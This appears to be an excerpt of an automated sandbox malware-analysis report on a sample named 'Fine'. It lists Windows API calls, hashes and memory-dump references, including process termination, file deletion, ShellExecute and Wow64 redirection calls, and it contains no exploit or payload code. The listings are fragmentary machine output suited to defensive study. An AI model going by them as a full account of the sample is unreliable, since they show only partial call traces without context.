                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d72a525d1718d38fd8893611a22494e43173b0e4d1ffd1d0c962b213c01ee6c9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF07D33A34701A7C311BB34BC0EA5E561D9FC9370B210015F91CD22E3EF608E324860
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D1F87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1F96
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: BeginPath.GDI32(?), ref: 001D1FAD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1FD6
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002694AA
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 002694BE
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002694CC
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 002694DC
                                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 002694EC
                                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 002694FC
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00235B7C
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00235B8D
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00235B94
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00235B9C
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00235BB3
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00235BC5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D32AF
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001D32B7
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D32C2
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D32CD
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001D32D5
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001D32DD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0023F447
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0023F45D
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0023F46C
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F47B
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F485
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F48C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 34547b9ab367f4c3d5fd492181ba84554129d26937ac5a3633dfe22576d5e983
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 90f1870c12602e4ce97057ba07e85087a5d9bdc719f660b747b9feb081254cb7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34547b9ab367f4c3d5fd492181ba84554129d26937ac5a3633dfe22576d5e983
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6F06D32B01158BBE7215B62AC0EEEB3A7CEBCAB11F004058F60591090D6E01A01C6B5
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 002134EF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00213506
                                                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00213512
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00213521
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00213533
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0021354D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d2d1eb3a5d8ae18674ca9d56c52444439037524e212ec11152de42beb3a1c744
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 862ae1216325fb30d1c036fd92b33ddf5d94cd5e941d9a7b01c293d284b37d0d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2d1eb3a5d8ae18674ca9d56c52444439037524e212ec11152de42beb3a1c744
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1014F31A00119FFDB515F64EC08BE97BB6FB18721F514160F91AA21A0CB711E919B51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002321CC
                                                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 002321D8
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002321E1
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002321E9
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002321F2
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002321F9
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bd1d6f880cf2e470a87e83be88281278d33da164794f98d987bd0d960093bdd9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c4a779099d5e82721afbc9386ea2284ba988fcb6a0242647cfeed3e13f8fb3b5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd1d6f880cf2e470a87e83be88281278d33da164794f98d987bd0d960093bdd9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FE0E57A604149BBDB011FA2FC0C90ABF39FF4A322B208260F22982170CBB29430DF51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0025B903
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 0025B998
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025B9C7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00237B6D
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00237BA3
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00237BB4
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00237C36
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002648D1
• IsMenu.USER32(?), ref: 002648E6
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0026492E
• DrawMenuBar.USER32 ref: 00264941
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
  • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002327B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002327C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 002327F6
  • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
Strings
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00263A29
• LoadLibraryW.KERNEL32(?), ref: 00263A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00263A45
• DestroyWindow.USER32(?), ref: 00263A4D
Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5c8124b503b15b806f9db490bd379c39947ee1db98a4dab51713ae801b2a4eb7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8477b6eec3f4cba64dd0c86154bceeda1541f4a09fb4c6bb8fb5ccdae5e15f7c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c8124b503b15b806f9db490bd379c39947ee1db98a4dab51713ae801b2a4eb7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F21A47261020AEFEF10CFA4DC84FBB77A9EB45364F105214FA91921D0C771DDA0AB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00269A5D
                                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00269A72
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00269ABA
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00269AF0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2864067406-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a70fd24cdba3e309f77eda6235e7d3c5a88913b73e60bfdd44b9ebb9f6532374
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ac78002c0fea1612710844d21998342e5827b4a2b7f3ee4b38c1274064ba7b0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a70fd24cdba3e309f77eda6235e7d3c5a88913b73e60bfdd44b9ebb9f6532374
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821BC35610018EFCF258F98D858EEA7BB9EB0A710F504069F9068B2A1DB719DE4DB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 001D1AF4
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 002131F9
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00213203
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0021320E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 4127811313-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 71103962fd05145ed7caac40d1216d81d5c7701b290eb4766aec947ff25658f3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b9ac4d1206395f182ca939c5a9f1a5d86a41dd67cc99142de35e1e9f69111ef6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71103962fd05145ed7caac40d1216d81d5c7701b290eb4766aec947ff25658f3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA114C31A0105AFBCB10DFA8E9499EE77B9EB05344F104452F912E3240C771BA91CBA1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001F508E,?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002), ref: 001F50FD
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F5110
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,001F508E,?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5133
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 804d7c7afde829ed13f71a31d9f296c501f09e0cf15659cb40242e2e480d3db0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf866503f5c401df865ebc7105bc6d10bd2bf29cfdab3508d6e11155cbc0eece
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804d7c7afde829ed13f71a31d9f296c501f09e0cf15659cb40242e2e480d3db0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2F06830A0020CBBDB155F98EC4DBADBFB5EF49752F0440A4F909A6160DBB45D51DA94
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D664A
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001D665C
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D666E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6610
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001D6622
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6635
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002435C4
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00243646
                                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024365C
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024366D
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024367F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0025AE87
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0025AE95
                                                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0025AEC8
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025B09D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1573241c4e57725a7043e4607a19dd9fa5f11605d3dfe718d8364b6bbddfe733
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ef9ce01e47262387208ed10d68ac41f57f39da8231b906aaef94e9fab008eb1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1573241c4e57725a7043e4607a19dd9fa5f11605d3dfe718d8364b6bbddfe733
